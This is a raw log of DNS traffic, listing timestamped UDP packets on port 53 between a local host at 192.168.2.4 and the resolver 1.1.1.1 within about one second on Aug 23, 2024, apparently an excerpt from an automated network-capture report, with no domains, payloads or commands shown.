Aug 23, 2024 18:47:43.035598040 CEST	53	49956	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.041318893 CEST	53	61229	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.042067051 CEST	61903	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.042439938 CEST	59180	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.042609930 CEST	60606	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.043823004 CEST	53	52489	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.048794985 CEST	53	54616	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.051276922 CEST	53	54445	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.058598995 CEST	53	60606	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.058866024 CEST	53	59180	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.065406084 CEST	49898	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.065756083 CEST	53841	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.065927029 CEST	60510	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.066067934 CEST	63431	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.066203117 CEST	62343	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.066406012 CEST	56174	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.068113089 CEST	54070	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.068502903 CEST	54521	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.068701029 CEST	58075	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.069247961 CEST	50785	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.069603920 CEST	52213	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.069782972 CEST	61269	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.069957018 CEST	60567	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.072442055 CEST	60568	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.082287073 CEST	53	63431	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.083039045 CEST	53	60510	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.083419085 CEST	53	49898	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.084275007 CEST	53	54521	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.085153103 CEST	53	50785	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.085994959 CEST	53	60568	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.086007118 CEST	53	52213	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.086064100 CEST	56155	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.086263895 CEST	62075	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.086515903 CEST	64714	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.086822987 CEST	58880	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.087775946 CEST	60714	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.087819099 CEST	61687	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.088041067 CEST	62002	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.088180065 CEST	62692	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.088318110 CEST	56677	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.088363886 CEST	59257	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.088471889 CEST	53	56174	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.088527918 CEST	62922	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.088671923 CEST	49665	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.088727951 CEST	59683	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.088831902 CEST	54452	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.113135099 CEST	53	54070	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.114499092 CEST	53	62343	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.114511967 CEST	53	61269	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.117311001 CEST	53	60567	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.117322922 CEST	53	53841	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.118715048 CEST	53	56155	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.118727922 CEST	53	58075	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.118736982 CEST	53	62075	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.121356964 CEST	53	56677	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.121368885 CEST	53	62922	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.121377945 CEST	53	60714	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.121387959 CEST	53	53641	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.121397972 CEST	53	59257	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.121407986 CEST	53	54452	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.121416092 CEST	53	59683	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.121424913 CEST	53	62692	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.121433020 CEST	53	49665	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.138891935 CEST	53	58880	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.139763117 CEST	53	62002	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.139775991 CEST	53	61687	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.141251087 CEST	53	64714	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.187403917 CEST	53	60188	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.193444014 CEST	53	61675	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.218333960 CEST	53	61903	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.349770069 CEST	55386	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.350606918 CEST	59474	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.351504087 CEST	52530	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.351603985 CEST	50914	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.352174997 CEST	60842	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.352245092 CEST	65325	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.352871895 CEST	50780	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.352889061 CEST	52890	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.353491068 CEST	63228	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.353511095 CEST	55954	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.354042053 CEST	52289	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.354324102 CEST	58784	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.354798079 CEST	64174	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.354798079 CEST	59717	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.355376005 CEST	52851	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.355506897 CEST	49894	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.355917931 CEST	51870	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.356435061 CEST	52290	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.356832027 CEST	61992	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.357229948 CEST	58734	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.357836962 CEST	49314	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.357867956 CEST	60643	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.358480930 CEST	62811	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.358694077 CEST	54526	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.358985901 CEST	57748	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.359324932 CEST	65514	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.359921932 CEST	60669	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.360440016 CEST	57332	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.360950947 CEST	55007	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.361115932 CEST	64564	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.361392975 CEST	62540	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.361845970 CEST	52261	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.362179041 CEST	53639	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.362559080 CEST	59386	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.362905025 CEST	59212	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.362972021 CEST	55487	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.363672972 CEST	51029	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.363970995 CEST	53065	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.364322901 CEST	61913	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.364408016 CEST	60362	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.365082979 CEST	57754	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.365082979 CEST	64789	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.365489960 CEST	63014	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.365881920 CEST	50030	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.366024971 CEST	53	59474	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.366345882 CEST	63760	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.366359949 CEST	53	55386	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.366555929 CEST	64209	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.366806030 CEST	53	52530	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.367665052 CEST	53	63228	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.367832899 CEST	53	65325	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.367844105 CEST	53	52890	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.369405985 CEST	53	64174	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.369877100 CEST	53	52851	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.370062113 CEST	53	59717	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.370073080 CEST	53	52289	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.370614052 CEST	53	49314	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.371267080 CEST	53	62811	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.371511936 CEST	53	51870	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.371522903 CEST	53	54526	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.371532917 CEST	53	58734	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.374270916 CEST	53	62540	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.375756979 CEST	53	59386	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.378757000 CEST	53	59212	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.379231930 CEST	53	51029	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.379242897 CEST	53	53639	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.380377054 CEST	53	55487	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.380656958 CEST	53	53065	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.381825924 CEST	53	57754	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.382102966 CEST	53	60362	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.382113934 CEST	53	64789	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.382704973 CEST	53	61913	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.382714987 CEST	53	50030	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.391994953 CEST	53	50780	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.394309044 CEST	53	50914	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.396305084 CEST	53	60842	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.396655083 CEST	53	58784	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.396667004 CEST	53	61992	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.398823023 CEST	53	65514	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.398838997 CEST	53	49894	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.398847103 CEST	53	60669	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.398852110 CEST	53	60643	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.398855925 CEST	53	57332	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.398860931 CEST	53	64564	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.398864985 CEST	53	55007	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.398874998 CEST	53	52261	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.398880005 CEST	53	52290	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.399873972 CEST	53	63014	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.403510094 CEST	53	63760	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.406445980 CEST	53	64209	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.413058043 CEST	54039	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.414772034 CEST	52165	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.414951086 CEST	50775	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.415096998 CEST	57851	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.415333986 CEST	59991	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.415463924 CEST	49799	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.415544987 CEST	62207	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.415689945 CEST	51054	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.416225910 CEST	55549	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.416538000 CEST	53727	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.416853905 CEST	59012	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.422352076 CEST	51409	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.422550917 CEST	58598	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.422724962 CEST	60158	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.422894955 CEST	59949	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.423177958 CEST	62341	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.423365116 CEST	58150	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.423906088 CEST	57681	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.438107967 CEST	53	52165	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.438466072 CEST	53	57851	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.438587904 CEST	53	50775	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.438862085 CEST	53	49799	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.439205885 CEST	53	51054	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.439217091 CEST	53	59991	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.439811945 CEST	53	62207	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.442214966 CEST	53	55549	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.442676067 CEST	53	59012	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.452251911 CEST	53	58598	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.453253984 CEST	53	51409	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.453264952 CEST	53	58150	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.455437899 CEST	53	60158	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.455451965 CEST	53	62341	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.455461979 CEST	53	59949	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.455471992 CEST	53	57681	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.460908890 CEST	53	54039	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.474078894 CEST	53	53727	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.530227900 CEST	53	55954	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.538196087 CEST	53	57748	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.760806084 CEST	62195	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.761616945 CEST	52905	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.762439966 CEST	52372	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.762994051 CEST	64846	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.763539076 CEST	61048	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.764175892 CEST	63922	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.764983892 CEST	61078	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.765520096 CEST	52054	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.766119003 CEST	60618	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.766649008 CEST	57697	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.767214060 CEST	54136	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.767750025 CEST	55696	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.768390894 CEST	61176	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.768914938 CEST	50666	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.769582987 CEST	54822	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.770107031 CEST	62914	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.770915031 CEST	56090	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.771476030 CEST	49181	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.772171974 CEST	51372	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.772661924 CEST	56979	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.773370028 CEST	50447	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.774012089 CEST	58750	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.774730921 CEST	64729	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.775394917 CEST	57824	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.776149988 CEST	56507	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.776676893 CEST	53868	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.777573109 CEST	63747	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.778444052 CEST	53	62195	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.780278921 CEST	58563	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.782680035 CEST	53	52372	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.783168077 CEST	63276	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.783368111 CEST	65383	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.783503056 CEST	64659	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.783869982 CEST	54065	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.784084082 CEST	53161	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.784375906 CEST	59828	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.784600973 CEST	51970	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.784653902 CEST	53	63922	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.784666061 CEST	53	57697	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.784919024 CEST	64473	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.785135984 CEST	65212	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.785321951 CEST	49262	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.785453081 CEST	52232	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.785926104 CEST	57250	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.786149025 CEST	60922	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.786401987 CEST	58407	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.786586046 CEST	65289	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.786766052 CEST	62261	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.786910057 CEST	53	54136	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.786969900 CEST	51107	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.787180901 CEST	52599	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.787220001 CEST	53	55696	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.787477970 CEST	60910	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.787821054 CEST	53	61176	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.787965059 CEST	54758	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.788198948 CEST	54903	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.788383007 CEST	56007	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.788465023 CEST	53	54822	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.788568020 CEST	63721	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.788777113 CEST	64092	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.788914919 CEST	65019	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.789300919 CEST	58694	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.789483070 CEST	59144	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.789727926 CEST	51385	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.789928913 CEST	53	56090	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.789952993 CEST	65475	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.790107012 CEST	50791	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.790288925 CEST	58542	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.790316105 CEST	53	56979	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.790327072 CEST	53	51372	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.790488958 CEST	58708	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.790663958 CEST	52294	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.790818930 CEST	61982	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.791018009 CEST	53	60618	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.791033030 CEST	60835	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.791255951 CEST	53	49181	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.791580915 CEST	61587	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.791800976 CEST	53	50447	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.799992085 CEST	53	53868	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.800170898 CEST	53	63747	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.800182104 CEST	53	57824	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.800653934 CEST	53	64729	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.805715084 CEST	53	58563	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.806020021 CEST	53	52905	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.807444096 CEST	53	61048	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.809235096 CEST	53	64659	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.810796022 CEST	53	65383	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.811742067 CEST	53	63276	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.812876940 CEST	53	51107	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.812889099 CEST	53	64846	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.813764095 CEST	53	52232	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.813775063 CEST	53	50666	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.814497948 CEST	53	65212	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.814619064 CEST	53	51970	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.814630985 CEST	53	62914	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.815135956 CEST	53	49262	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.815145969 CEST	53	53161	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.815155029 CEST	53	57250	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.815166950 CEST	53	60922	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.815176010 CEST	53	62261	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.815186977 CEST	53	59828	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.815888882 CEST	53	52599	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.816562891 CEST	53	60910	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.816956043 CEST	53	63721	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.817608118 CEST	53	65289	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.817696095 CEST	53	58750	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.817706108 CEST	53	64092	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.817795992 CEST	53	56007	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.817806005 CEST	53	65019	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.817816019 CEST	53	51385	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.818276882 CEST	53	54758	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.818538904 CEST	53	58542	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.818547964 CEST	53	52294	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.818655014 CEST	53	50791	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.819715023 CEST	53	65475	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.820785046 CEST	53	58708	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.821137905 CEST	53	61587	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.821147919 CEST	53	60835	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.821247101 CEST	53	61982	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.832201958 CEST	53	54065	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.835057974 CEST	53	58407	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.837970018 CEST	53	59144	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.841598034 CEST	53	54903	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.841609955 CEST	53	64473	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.940402985 CEST	53	52054	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.946537971 CEST	53	61078	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.964014053 CEST	53	58694	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.990935087 CEST	50832	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.991859913 CEST	58367	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.993124008 CEST	57917	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.993768930 CEST	64781	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.994611025 CEST	53824	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.996454000 CEST	61998	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.997402906 CEST	59732	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.998368025 CEST	55561	53	192.168.2.4	1.1.1.1
